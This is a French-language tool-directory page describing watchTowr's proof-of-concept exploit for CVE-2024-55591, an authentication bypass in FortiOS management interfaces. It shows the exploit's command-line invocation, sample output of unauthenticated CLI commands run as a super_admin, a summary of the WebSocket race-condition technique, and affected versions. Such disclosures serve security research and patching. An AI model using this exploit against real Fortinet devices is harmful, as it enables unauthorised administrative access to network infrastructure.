Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
fortios-auth-bypass-poc-CVE-2024-55591 | Kitploit
Outils/GitHubGitHub/watchtowrlabs/fortios-auth-bypass-poc-cve-2024-55591
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleAuthentificationRed Teaming
GitHubwatchtowrlabs/fortios-auth-bypass-poc-cve-2024-55591

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

fortios-auth-bypass-poc-CVE-2024-55591

Voir le dépôt
7719il y a 1 anVérifié par Kitploit

CVE-2024-55591

Une preuve de concept de contournement d'authentification Fortinet FortiOS

Consultez notre article de blog pour plus de détails techniques

Détection en action

root@kitploit:~
python CVE-2024-55591-PoC.py --host 192.168.1.5 --port 443 --command "get system status" --user watchTowr --ssl
             __         ___  ___________                   
     __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
     \ \/ \/ \__  \    ___/ ___\|  |  \\|    | /  _ \ \/ \/ \_  __ \
      \     / / __ \|  | \  \\___|   Y  |    |(  <_> \     / |  | \
       \/\_/ (____  |__|  \\\\___  |___|__|__  | \\__  / \\/\_/  |__|   
                  \\          \\     \\                              

        CVE-2024-55591.py
        (*) Fortinet FortiOS Authentication Bypass (CVE-2024-55591) POC by watchTowr
        
          - Sonny , watchTowr ([email protected])

        CVEs: [CVE-2024-55591]

[*] Checking if target is a FortiOS Management interface
[*] Target is confirmed as a FortiOS Management interface
[*] Target is confirmed as vulnerable to CVE-2024-55591, proceeding with exploitation
Output from server: �m"watchTowr" "admin" "watchTowr" "super_admin" "watchTowr" "watchTowr" [13.37.13.37]:1337 [13.37.13.37]:1337

Output from server: �
get system status

Output from server: �~�FAKESERIAL # "Local_Process_Access" "Local_Process_Access" "root" "" "" "none" [x.x.x.x]:54546 [x.x.x.x]:443
Unknown action 0

FAKESERIAL # 
FAKESERIAL # get system status
Version: FortiGate-VM64-AWS v7.0.16,build0667,241001 (GA.M)
Security Level: High
Firmware Signature: certified
Virus-DB: 1.00000(2018-04-09 18:07)

Description

Ce script est une preuve de concept pour CVE-2024-55591, ciblant les interfaces de gestion FortiOS (Fortigate). En créant des connexions WebSocket en force brute pour provoquer une condition de course associée à un contournement d'authentification, il est possible d'envoyer des commandes CLI FortiOS sans authentification. Plus de détails sont décrits dans notre [article de blog] (https://labs.watchtowr.com/).

Versions affectées

  • FortiOS 7.0.0 à 7.0.16
  • FortiProxy 7.0.0 à 7.0.19
  • FortiProxy 7.2.0 à 7.2.12

Plus de détails sur l'avis Fortinet

Note

Ce script n'est pas conçu pour fonctionner avec FortiProxy, car les vérifications préliminaires déterminent si l'instance est une interface de gestion FortiGate, mais il est supposé que la technique sous-jacente s'applique aux appareils FortiProxy concernés.

Suivez watchTowr Labs

Pour les dernières recherches en sécurité, suivez l'équipe watchTowr Labs

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
Télécharger l’outil